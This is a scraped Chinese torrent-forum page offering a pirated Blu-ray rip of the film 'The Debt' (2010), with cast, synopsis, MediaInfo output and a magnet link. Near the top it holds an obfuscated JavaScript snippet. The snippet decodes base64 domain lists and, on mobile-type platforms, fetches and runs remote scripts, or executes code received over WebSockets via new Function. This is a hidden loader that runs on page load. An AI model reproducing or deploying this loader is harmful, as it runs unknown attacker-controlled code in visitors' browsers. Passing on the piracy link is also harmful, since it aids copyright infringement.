罪孽[繁体字幕].The.Debt.2010.BluRay.1080p.DTS-HD.MA5.1.x265.10bit-迅雷下载 9.68GB

版主小s 22天前 229

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 罪孽/L'Affaire Rachel Singer/特务谜云(台)/谍债(港)

◎片 名 The Debt

◎年 代 2010

◎产 地 美国,英国,匈牙利,以色列

◎类 别 剧情 / 惊悚

◎语 言 英语,德语,俄语

◎上映日期 2010-09-04(多维尔美洲电影节) / 2011-08-31(美国)

◎豆瓣评分 7.2/10 from 9133 users

◎豆瓣链接 https://movie.douban.com/subject/3059403/

◎片 长 114分钟

◎导 演 约翰·马登 John Madden

◎编 剧 马修·沃恩 Matthew Vaughn / 简·古德曼 Jane Goldman / 彼特·斯特劳恩 Peter Straughan / 阿萨夫·伯恩斯坦 Assaf Bernstein / Ido Rosenblum Ido Rosenblum

◎主 演 海伦·米伦 Helen Mirren

杰西卡·查斯坦 Jessica Chastain

塞伦·希德 Ciarán Hinds

萨姆·沃辛顿 Sam Worthington

汤姆·威尔金森 Tom Wilkinson

马尔顿·索克斯 Marton Csokas

加斯帕·克里斯滕森 Jesper Christensen

罗米·阿波拉菲娅 Romi Aboulafia

乔纳森·乌泽尔 Jonathan Uziel

伊伦·波丹 Irén Bordán

布里吉特·克雷 Brigitte Kren

?亚历山大·贾格施? Alexander Jagsch

Kátya Tompos Kátya Tompos

István G?z István G?z

Morris Perry Morris Perry

◎标 签 悬疑 | 美国 | 特工 | 剧情 | 政治 | 惊悚 | 2011 | 动作

◎简 介

由蕾切尔(杰西卡·查斯坦 Jessica Chastain 饰)、斯蒂芬(马尔顿·索克斯 Marton Csokas 饰)和大卫(萨姆·沃辛顿 Sam Worthington 饰)组成的以色列秘密特工小组曾经在效命年间叱咤风云,如今虽已全部退休,却仍然是特工后辈们的偶像。然而功成身退的蕾切尔(海伦·米伦 Helen Mirren 饰)却始终放不下一个心结,那就是30年前小组千辛万苦追查的一名纳粹战犯沃格尔(加斯帕·克里斯滕森 Jesper Christensen 饰)在关键时刻突然神秘失踪了,使得任务无疾而终。令人意想不到的是,如今小组成员竟然同时得到讯息说沃格尔又重现江湖,三人再次聚首,然而蕾切尔却在秘密调查中意外发现当年的追查报告存在造假嫌疑,这使她开始无法信任两位同事,而各自背后深藏的惊天秘密也如剥茧般渐渐浮出水面……

本片翻拍自2007年的以色列同名电影。

◎获奖情况

第16届圣地亚哥影评人协会奖 ?(2011)

年度劳模 杰西卡·查斯坦

  1. General

  2. Unique ID : 259855577153266725501839407814055266614 (0xC37E5D1D1E1FB6A3B1E7A7CBE6478936)

  3. Complete name : The.Debt.2010.BluRay.1080p.DTS-HD.MA5.1.x265.10bit-BeiTai.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 9.68 GiB

  7. Duration : 1 h 53 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 12.2 Mb/s

  10. Encoded date : UTC 2021-07-04 06:08:10

  11. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  12. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 53 min

  20. Bit rate : 9 746 kb/s

  21. Width : 1 920 pixels

  22. Height : 800 pixels

  23. Display aspect ratio : 2.40:1

  24. Frame rate mode : Constant

  25. Frame rate : 23.976 (24000/1001/53354) FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.265

  30. Stream size : 7.72 GiB (80%)

  31. Title : HEVC, [email protected]@High, 24/1.001 fps @ 9745 kbps

  32. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  33. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=16 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=1920x800 / interlace=0 / total-frames=163080 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=5 / no-allow-non-conformance / no-repeat-headers / annexb / no-aud / no-hrd / info / hash=0 / no-temporal-layers / open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=6 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=40 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=32 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=25 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=17.0 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=80000 / vbv-bufsize=80000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.40 / pbratio=1.30 / aq-mode=2 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  34. Language : English

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.709

  39. Transfer characteristics : BT.709

  40. Matrix coefficients : BT.709


  41. Audio #1

  42. ID : 2

  43. Format : DTS XLL

  44. Format/Info : Digital Theater Systems

  45. Commercial name : DTS-HD Master Audio

  46. Codec ID : A_DTS

  47. Duration : 1 h 53 min

  48. Bit rate mode : Variable

  49. Bit rate : 2 171 kb/s

  50. Channel(s) : 6 channels

  51. Channel layout : C L R Ls Rs LFE

  52. Sampling rate : 48.0 kHz

  53. Frame rate : 93.750 FPS (512 SPF)

  54. Bit depth : 16 bits

  55. Compression mode : Lossless

  56. Stream size : 1.72 GiB (18%)

  57. Title : English DTS-HD Master Audio 5.1 @ 2171 kbps

  58. Language : English

  59. Default : Yes

  60. Forced : No


  61. Audio #2

  62. ID : 3

  63. Format : AC-3

  64. Format/Info : Audio Coding 3

  65. Commercial name : Dolby Digital

  66. Codec ID : A_AC3

  67. Duration : 1 h 53 min

  68. Bit rate mode : Constant

  69. Bit rate : 192 kb/s

  70. Channel(s) : 2 channels

  71. Channel layout : L R

  72. Sampling rate : 48.0 kHz

  73. Frame rate : 31.250 FPS (1536 SPF)

  74. Compression mode : Lossy

  75. Stream size : 156 MiB (2%)

  76. Title : English Dolby Digital Audio 2.0 @ 192 kbps Commentary

  77. Language : English

  78. Service kind : Complete Main

  79. Default : No

  80. Forced : No


  81. Text #1

  82. ID : 4

  83. Format : PGS

  84. Codec ID : S_HDMV/PGS

  85. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration : 1 h 45 min

  87. Bit rate : 25.5 kb/s

  88. Count of elements : 2028

  89. Stream size : 19.2 MiB (0%)

  90. Title : Eng/SUP

  91. Language : English

  92. Default : No

  93. Forced : No


  94. Text #2

  95. ID : 5

  96. Format : PGS

  97. Codec ID : S_HDMV/PGS

  98. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration : 1 h 52 min

  100. Bit rate : 16.0 kb/s

  101. Count of elements : 1650

  102. Stream size : 12.8 MiB (0%)

  103. Title : Cht/SUP 原盘繁体(HK)

  104. Language : Chinese

  105. Default : No

  106. Forced : No


  107. Text #3

  108. ID : 6

  109. Format : PGS

  110. Codec ID : S_HDMV/PGS

  111. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  112. Duration : 1 h 52 min

  113. Bit rate : 15.8 kb/s

  114. Count of elements : 1650

  115. Stream size : 12.7 MiB (0%)

  116. Title : Cht/SUP 原盘繁体(TW)

  117. Language : Chinese

  118. Default : Yes

  119. Forced : No


  120. Text #4

  121. ID : 7

  122. Format : PGS

  123. Codec ID : S_HDMV/PGS

  124. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  125. Duration : 1 h 46 min

  126. Bit rate : 62.3 kb/s

  127. Count of elements : 3089

  128. Stream size : 47.4 MiB (0%)

  129. Title : Eng/SUP Commentary

  130. Language : English

  131. Default : No

  132. Forced : No


  133. Menu

  134. 00:00:00.000 : en:第 01 章

  135. 00:06:34.936 : en:第 02 章

  136. 00:12:22.200 : en:第 03 章

  137. 00:20:19.927 : en:第 04 章

  138. 00:25:48.422 : en:第 05 章

  139. 00:31:25.967 : en:第 06 章

  140. 00:38:02.947 : en:第 07 章

  141. 00:42:58.493 : en:第 08 章

  142. 00:49:52.072 : en:第 09 章

  143. 00:54:40.360 : en:第 10 章

  144. 01:01:31.646 : en:第 11 章

  145. 01:07:48.231 : en:第 12 章

  146. 01:11:33.664 : en:第 13 章

  147. 01:14:37.390 : en:第 14 章

  148. 01:19:26.345 : en:第 15 章

  149. 01:25:31.460 : en:第 16 章

  150. 01:29:42.919 : en:第 17 章

  151. 01:35:27.722 : en:第 18 章

  152. 01:40:49.252 : en:第 19 章

  153. 01:46:55.409 : en:第 20 章


TAGS 剧情 惊悚

磁力链:
  • magnet:?xt=urn:btih:BDB4FF286C375B91F4831F20CEE518B6EFF12D18
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回